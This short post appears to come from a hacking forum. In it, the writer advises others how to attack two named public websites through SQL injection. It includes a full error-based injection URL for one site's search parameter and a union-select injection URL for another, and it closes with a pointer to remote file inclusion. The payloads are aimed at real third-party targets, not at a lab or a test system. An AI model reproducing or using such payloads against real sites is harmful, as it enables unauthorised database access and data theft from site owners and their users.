devv,
about aromline.ru,the injection point is here-
Код:
select count(*) from table where column like (data or (column like '%[injection]%' or column like '%[injection]%' or column like '%injecion%'))
also,there is whitespace,so we can avoid that and execute our error based injection (since union cannot be with count(*)) like that-
Код:
http://www.aromline.ru/index.php?searchstring=\'))or(1)group/**/by(concat(version(),0x0,floor(rand(0)*2)))having(min(0))%23&offset=400
about publicdomainpictures.net
you can execute union like that-
Код:
http://www.publicdomainpictures.net/sponsored_pictures.php?page=495 and 540 div 0 union select 1,2,3,4,5,6-- -
but no column,so you better use error based.
Iwashka,
its call Remote File Inclusion,learn some-
http://en.wikipedia.org/wiki/Remote_file_inclusion